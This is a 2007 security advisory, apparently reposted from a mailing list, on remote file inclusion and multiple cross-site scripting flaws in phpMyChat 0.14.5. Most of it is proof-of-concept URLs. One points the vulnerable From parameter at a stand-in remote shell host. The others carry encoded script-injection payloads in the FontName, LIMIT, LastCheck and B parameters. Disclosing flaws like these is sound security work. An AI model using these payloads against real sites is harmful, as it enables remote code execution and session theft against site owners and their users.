Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Blind Sql-Injection in Joomla 1.5 RC3

  [ECHO_ADV_86$2007] Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability

  Sql Injection in wordpress 2.3.1

  Snitz2000 SQL Injection: A user can gain admin level

From:beenudel1986_(at)_gmail.com <beenudel1986_(at)_gmail.com>
Date:05.12.2007
Subject:RFI and Multiple XSS in PhpMyChat

~~~~~~~~~~~~~~~~Application : phpMyChat 0.14.5~~~~~~~~~~~~~~~~


Email ; beenudel1986@gmail.com

Website: http://phpmychat.sourceforge.net/

Many webhosting companies are offering this version of phpMychat in their cpanel :)

               ----------------------------
               |   Remote File Inclusion:  |
                ----------------------------


http://localhost/path_to_phpMychat/chat/users_popupL.php3
Parameter = From

POC = http://localhost/path_to_phpMychat/chat/users_popupL.php3?From=http://evilshell




                             ---------------
                 |Multiple XSS |
                             ---------------


a.Vulnerable URL: http://localhost/phpmychat/chat/deluser.php3
Parameter = LIMIT

POC =http://localhost/phpmychat/chat/config/start_page.css.php3?Charset=iso-8859-
1&medium=10&FontName= >"'><img%20src%3D%26%23x6a;%26%23x61;%
26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23
x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert
(%26quot;Successfull%26%23x20;XSS%26%23x20;Test%26%
23x20;Here%26quot;)>

b. Vulnerable URL: http://www.localhost/mychat/chat/deluser.php3
Parameter = LIMIT

POC = http://www.localhost/phpmychat/chat/deluser.php3?L=english&Link=&LIMIT=>
"'><img%20src%3D%26%23x6a;%26%23x61;%2
6%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x
72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(
%26quot;Successfull%26%23x20;XSS%26%23x20;Test%26%23x
20;Here%26quot;)>&AUTH_USERNAME=&AUTH_PASSWORD=

c. Vulnerable URL: http://www.localhost/phpmychat/chat/edituser.php3

Parameter= Link , still lokking for pOC ;)

d.Vulnerable URL= http://localhost/phpmychat/chat/users_popupL.php3
Parameter = LastCheck

POC = http://localhost/mychat/chat/users_popupL.php3?From=..%2FphpMyChat.
php3&L=english&LastCheck= "></STYLE><STYLE>@import"javascript:
alert('This%20XSS%20Is%20Xss')";</STYLE>'


e. Vulnerable URL: http://localhost/phpmychat/chat/users_popupL.php3
Parameter = B

POC =http://localhost/phpmychat/chat/users_popupL.php3?From=..%2FphpMyChat.
php3&L=english&LastCheck=1196698786&B= >"><script>alert("This%20XSS%20Test%20Succe
ssful")</script>

f.Vulnerable URL: http://localhost/phmychat/chat/users_popupL.php3
Parameter =From

POC = http://localhost/phpmychat/chat/users_popupL.
php3?From=>"><script>alert("This%20XSS%20Test%
20Successful")</script>

g. Vulnerable URL = http://localhost/phpmychat/chat/config/start_page.css.php3

Parameter = FontName
Parameter = medium

h. Vulnerable URL: http://localhost/phpmychat/chat/config/style.css.php3
Parameter = FontName
Parameter = medium

POC = http://localhost/phpmychat//mychat/chat/config/style.css.php3?Charset=iso-8859-
1&medium=10&FontName=>"'><img%20src%3D%26%
23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%
26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23
x74;%26%23x3a;alert(%26quot;This%26%23x20;XSS%26%
23x20;Test%26%23x20;Successful%26quot;)>
Try the second one urself or mail me to have the POC :P

   ~~~~~~~~~~~~~~~~~~greetz to mah friend d3 , icqbomber , baltazar~~~~~~~~~~~~~~~~~~
--

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 



Rating@Mail.ru